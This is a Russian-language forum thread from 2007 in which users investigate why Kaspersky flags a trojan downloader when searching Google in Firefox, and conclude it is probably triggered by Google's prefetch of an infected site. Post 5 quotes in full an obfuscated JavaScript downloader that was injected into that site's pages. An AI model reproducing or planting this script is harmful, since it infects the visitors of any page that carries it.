Customizegoogle, Firefox и Google - опасность заражения компа

Wiccanmist · №1

Я пользуюсь различными сервисами от Google и нашел, как раньше думал, замечательное расширение Customizegoogle Однако в последнее время при поиске в Google я стал замечать попытки открытия ссылок на неизвестные сайты (например запрос на авторизацию на различных форумах и ресурсах) а сегодня Касперский отловил попытку установки опасного ПО во время поиска, точнее Trojan-Downloader.JS.Agent.jn все это происходит при использовании этого расширения Встает вопрос, а безопасно ли это расширение? Как расширение, которое является потенциально опасным, попало на официальные серверы mozilla? Как тщательно проверяются дополнения к Огнелису?

Отредактировано Wiccanmist (24-06-2007 05:09:33)

Wiccanmist · №2

Хм, если попробовать искать по ссылке опасного сайта, в огнелисе осуществляется попытка установки вреданосного ПО, при аналогичных действиях в Ие такое не происходит это что, дыра лисы?

Добавлено Вск 24 Июн 2007 05:06:48 :
Похоже что тут все сложнее, расширение только показало что это проблема конкретно Firefox и Google, только если использовать поиск в гугле через файрфокс при определенных запросах, это приводит к инициации установки вредоносного ПО Расширение просто повышает возможность наткнуться на вири и трояны

Отредактировано Wiccanmist (24-06-2007 04:48:16)

dvdianov · №3

Wiccanmist
А с какими сайтами он пытается соединяться?

Wiccanmist · №4

По разному, например при запросе "вирджиния вулф" пытается соединиться с coolsoch.ru (только при включенном расширении). Если забить адрес этого сайта в поиск, то опять таки происходит попытка установки Trojan-Downloader.JS.Agent.jn Если набить этот же нэт адрес в гугл, но в Ие ничего не происходит, так же если попытаться искать это сайт в том же Огнелисе, но через другую поисковую систему. Так что такая вот зависимость -
используешь расширение и начинаются произвольные соединения с другими сайтами во время поиска. Если в гугле через Firefox искать инфу о зараженном сайте (с использованием расширения или без него) то он не просто найдет ссылки о нем, а еще начнет инициацию установки всякой гадости
P.S.
Кстати расширение меняет порядок поисковых ссылок, т.е. с включенным расширением одни ссылки без расширения - совсем другие

Отредактировано Wiccanmist (24-06-2007 11:56:19)

Баннер · №5

пытается соединиться с coolsoch.ru

Ничего удивительного, что каспер ругается.
Там внизу свежий скриптик есть, который, наверное не очень хороший.

Выделить код

Код:

><script>document.write(unescape("%3Cscript%3Etry%20%7Bvar%20Egp%3D%27zzEzkEzpEzgEz8EztEzsEzYEzTEzGEznEzIEzxEzaEzDEz4EzlEzyEzWEzAEzOEzoEz3EzhEzKEzbEzwEzPEzHEzNEzrEz7EzfEzjEzJEzMEzcEzBEzREz9EzVEzXEzeEziEzUEzmEzFEzZEzSEzqEzLEz6EzdEz5EkzEkkEkpEkgEk8EktEksEkYEkTEkGEknEkIEkxEkaEkDEk4EklEkyEkWEkAEkOEkoEk3EkhEkKEkbEkwEkPEkH%27%2CkFS%3DString%28%27E%27%29%3Bvar%20lcE%3DArray%2828463%5E28611%2C14484%5E14391%2CuQl%28%27179%27%29%2CuQl%28%27162%27%29%2CuQl%28%27185%27%29%2C20673%5E20577%2CuQl%28%27164%27%29%2CuQl%28%27238%27%29%2C27079%5E26993%2C494%5E331%2CuQl%28%27190%27%29%2C5362%5E5197%2CuQl%28%27240%27%29%2C80%5E201%2C32556%5E32669%2CuQl%28%27161%27%29%2C15955%5E16043%2C11995%5E11875%2C19527%5E19695%2C31718%5E31613%2CuQl%28%27252%27%29%2CuQl%28%27152%27%29%2CuQl%28%27166%27%29%2CuQl%28%27156%27%29%2CuQl%28%27249%27%29%2CuQl%28%27171%27%29%2C22833%5E22959%2CuQl%28%27188%27%29%2CuQl%28%27149%27%29%2C2300%5E2065%2C31248%5E31397%2CuQl%28%27167%27%29%2CuQl%28%27148%27%29%2C20682%5E20513%2C23753%5E23607%2C17257%5E17389%2CuQl%28%27189%27%29%2C15856%5E15687%2CuQl%28%27251%27%29%2C31161%5E31057%2CuQl%28%27230%27%29%2CuQl%28%27228%27%29%2C1933%5E1901%2CuQl%28%27180%27%29%2C24576%5E24763%2C2531%5E2321%2CuQl%28%27151%27%29%2C20070%5E20219%2CuQl%28%27131%27%29%2CuQl%28%27173%27%29%2CuQl%28%27129%27%29%2C31100%5E31115%2CuQl%28%27225%27%29%2CuQl%28%27136%27%29%2CuQl%28%27150%27%29%2CuQl%28%27133%27%29%2CuQl%28%27128%27%29%2C25916%5E26051%2C21764%5E21915%2CuQl%28%27253%27%29%2CuQl%28%27234%27%29%2CuQl%28%27241%27%29%2C26510%5E26465%2C13557%5E13439%2C25370%5E25489%2CuQl%28%27142%27%29%2C8555%5E8641%2C13750%5E13663%2CuQl%28%27141%27%29%2CuQl%28%27140%27%29%2CuQl%28%27186%27%29%2C19528%5E19673%2C321%5E499%2C24827%5E24681%2CuQl%28%27227%27%29%2C446%5E279%2C31552%5E31699%2C32461%5E32279%2CuQl%28%27226%27%29%2C19152%5E18997%2C12474%5E12381%2CuQl%28%27134%27%29%2CuQl%28%27250%27%29%29%2CBUO%3Bvar%20zfl%2CkEQ%3Bvar%20gFr%3D%27zzzkzpzgz8ztzszYzTzGznzpzsz8zIznzxzazDz4zlzyzWzAzOzoz3zhzKzbzxz3zDzgzxzwzPzHzNznzrz7zxzfzDzszrzlzKzOzxzTzazwzNzxznzrz7zxzfzDzszrzlzKzjzxzTzazwzJzkzrzszMz8zczrzlzwzPzHzJzBzrzszMz8zczrzlzKzRz9zVzXzezezezezezKzjzxzizIzpzGzczrznzszJzpzIzIzUz8zrzxzNzxzyzWzAzRzmzNzmzRzrzkzpzDztzrzlzoz3zhzKzRzmzjzrzWztz8zgzrzkzNzmzRzTzazwzJzszIzFzZzMzSzszgz8znzBzlzKzjzxzqz3zDzgzxzZzLzMzNz6zkzdzTzIztzsz6zjz3zDzgzxzyz5kzzNz6zdz6zOzyzLz8zNz6zGztzizDzszrzdzJzpzPzDzkzkz8zpzszrzPzJzIzgzBz6zjz3zDzgzxzWkkkpzNz6kgzyzszczPkgz6zjz8zTzlzizIzpzGzczrznzszJzpzIzIzUz8zrzJz8znzizrzWk8zTzlzZzLzMzRz6zNz6zRzyz5kzzKzNzNktzdzKzbzxz3zDzgzxz8zUzyzNz6zyzszsztkskgkgz6zRzlzizIzpzGzczrznzszJzPzIzpzDzsz8zIznzJzyzIzkzszxkYzNzxz6z6kTz6z6kszDkGzfzlzKzKzRzizIzpzGzczrznzszJzPzIzpzDzsz8zIznzJzyzIzkzszJzgzrztzPzDzpzrzlkgknkIzDktkxzektkazJktkDkgzOz6zJz6zKzJzgzrztzPzDzpzrzlkgk4zJzRkgzOz6zJz6zKzRz6zJz6zRzDkGzfzlzKzRz6zJz6zRzyzLz8zRzWkkkpzjz3zDzgzxz4klzkzNzizIzpzGzczrznzszJzpzgzrzDzszrzHzPzrzczrznzszlz6z8zTzgzDzczrz6zKzjz4klzkzJzkzrzskyzszszgz8kWzGzszrzlz6zkzgzpz6zOz8zUzyzKzjz4klzkzJzTzgzDzczrkAzIzgzizrzgzNzezjzxz4klzkzJz7z8zizszyzNzXzjz4klzkzJzyzrz8zBzyzszNkOzjzszgkozxzbzxzizIzpzGzczrznzszJkWzIzikozJzDztztzrznzik3zyz8zPzizlz4klzkzKzjzazDz4zlzZzLzMzOzyz5kzzKzjzxzqzpzDzszpzyzlzrzKzbzxzizIzpzGzczrznzszJz7zgz8zszrzlz6zzzyzszczPzYzzkWzIzikozYzzkgkWzIzikozYzzkgzyzszczPzYz6zKzjzizIzpzGzczrznzszJkWzIzikozJzDztztzrznzik3zyz8zPzizlz4klzkzKzjzxzazDz4zlzZzLzMzOzyz5kzzKzjzxzqzxzqkhzTzGznzpzsz8zIznzxzDkGzfzlzKzbzxz3zDzgzxkykozFzNkKzXzjz3zDzgzxzazFk3zNzmzezdkKkOzXkbzVkwz9kazezDkWzpzizrzTzmzOkzzfzDzNzmzmzjzxzTzIzgzlkAzIkPzNzezjzxkAzIkPzxzzzxkykozFzjzxkAzIkPzRzRzKzxkzzfzDzRzNzxzazFk3zJzkzGkWzkzszgzlzZzDzszyzJzTzPzIzIzgzlzZzDzszyzJzgzDznzizIzczlzKkHzazFk3zJzPzrznzBzszyzKzOzdzOzdzKzjzxzgzrzszGzgznzxkzzfzDzjzxzqzzkgzkzpzgz8ztzszY%27%2CvEh%3D%27%27%3BEgp%3DEgp.split%28kFS%29%3Bfor%28BUO%3D0%3BBUO%3CgFr.length%3BBUO+%3D2%29%7BkEQ%3DgFr.substr%28BUO%2C2%29%3Bfor%28zfl%3D0%3Bzfl%3CEgp.length%3Bzfl++%29%7Bif%28Egp%5Bzfl%5D%3D%3DkEQ%29break%3B%7D%20vEh+%3DString.fromCharCode%28lcE%5Bzfl%5D%5E208%29%3B%7Dfunction%20uQl%28LXO%29%7Breturn%20parseInt%28LXO%29%7Ddocument.write%28vEh%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script><!--[/O]-->

Wiccanmist · №6

И все таки что это может все означать? Дыру в фоксе? или сервисах google? Customizegoogle сам по себе не опасен (во всяком случае так терь думаю) он просто повышает возможность натолкнуться на эту проблему при поиске в гуле

Modex · №7

(только при включенном расширении)

Может быть в настройках расширения (которое непосредственно к разработкам гугла не относится) есть какие-либо настройки подгрузки первой страницы из списка к примеру? Предпросмотр страниц к примеру может быть (я правда не помню что там расширение ещё может)...

Wiccanmist · №8

Есть просмотр фавиконов, но возможность установки вреданостного ПО есть и без использования расширения (например, берем адрес того сайта coolsoch.ru и вводим в поиск в Google, после ччего сразу всплывает предупреждение KIS при чем тока в Firefox)

Отредактировано Wiccanmist (24-06-2007 14:06:30)

Modex · №9

Хм... NoScript рулит
Но сам по себе Firefox просто так поставить какое-либо ПО не даст, будет переспрашивать вашего мнения

Баннер · №10

Но сам по себе Firefox просто так поставить какое-либо ПО не даст, будет переспрашивать вашего мнения

Ну это только если не используется какая-либо свежая дыра.

например, берем адрес того сайта coolsoch.ru и вводим в поиск в Google, после ччего сразу всплывает предупреждение KIS при чем тока в Firefox)

Может начали скрипты под fox ради прикола точить?

ego · №11

Wiccanmist
Достаточно набрать coolsoch.ru в панели поиска, чтобы KIS начал ругаться? False positive (например, из-за search suggestions) не может быть?

Wiccanmist · №12

ego заходишь на сайт http://www.google.ru/ в строке поиска набиваешь coolsoch.ru жмешь "Поиск в Google" и ... вот тебе и сообщение KIS ...

ego · №13

Я думаю, это из-за использования prefetch. Google ставит <link rel="prefetch" href="http://www.coolsoch.ru/"> - и Fx начинает подгружать страницу в фоне.

Насколько я понял, Google включает prefetch для первого результата поиска.

Отредактировано ego (24-06-2007 17:12:18)

VeryGoodName · №14

ego пишет

Я думаю, это из-за использования prefetch. Google ставит <link rel="prefetch" href="http://www.coolsoch.ru/"> - и Fx начинает подгружать страницу в фоне.
Насколько я понял, Google включает prefetch для первого результата поиска.

Если так, то проблемы с безопасностью видимо нет. Касперский проверяет все, что выкачивается из сети, независимо от того, кто это делает и почему. Если там эксплойт под ИЕ, а выкачивает ФФ -- на который этот эксплойт в принципе не действует, он все равно будет ругаться.

Фаерфокс заранее выкачивает первую ссылку, чтобы потом быстро ее показать, на случай если вы ее потом кликнете (это называтеся prefetch), а Каспер находит там враждебный код, поскольку он там есть. Однако, во-первых, ФФ наверняка не будет интерпретировать этот код, так что даже если бы он срабатывал, опасности бы не было. Поскольку нет никакого смысла выполнять то, что загружено в режиме префетча.

Во-вторых, как я уже написал, сообщ Касперского вовсе не означает, что данный код опасен в данной ситуации. Он проверят только то, что он опасен вообще. По всей видимости, это очередной эксплойт под ИЕ, который на ФФ не подействует, даже если вы зайдете на эту страницу.

В общем, вывод у меня такой, что это ложная тревога.

Чтобы проверить, что дело именно в этом, можно попробовать отключить префетч, потом посмотреть список результатов поиска -- сообщений антивируса быть не должно. Потом попытаться зайти на эту страницу. Тут антивирус должен заорать.

Если так и будет, значит предположение ego правильное и бояться в данном случае нечего.
Хотя всегда не помешает убедиться, что у вас самая свежая версия ФФ.

Отредактировано VeryGoodName (04-07-2007 14:12:18)

VeryGoodName · №15

Апдейт: на сайте coolsoch.ru этого кода уже нет, видимо админы уже убрали. Но вообще этой фигни много по интернету. Видимо, она умеет как-то заражать сайты.

memini · №16

Могу я узнать, какого черта лиса вообще что-то выкачивает по префетчу?

Добавлено Срд 04 Июл 2007 14:29:04 :
Могу я узнать, какого черта лиса вообще что-то выкачивает по префетчу?

Полезная информация

№124-06-2007 04:13:09

Customizegoogle, Firefox и Google - опасность заражения компа

№224-06-2007 04:47:23

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№324-06-2007 10:35:27

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№424-06-2007 11:52:11

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№524-06-2007 12:08:18

Re: Customizegoogle, Firefox и Google - опасность заражения компа

Код:

№624-06-2007 14:00:22

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№724-06-2007 14:01:15

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№824-06-2007 14:06:04

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№924-06-2007 14:09:23

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№1024-06-2007 15:25:52

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№1124-06-2007 16:02:06

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№1224-06-2007 16:14:15

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№1324-06-2007 16:59:35

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№1404-07-2007 11:46:18

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№1504-07-2007 14:10:58

Re: Customizegoogle, Firefox и Google - опасность заражения компа

№1604-07-2007 14:26:51

Re: Customizegoogle, Firefox и Google - опасность заражения компа

Board footer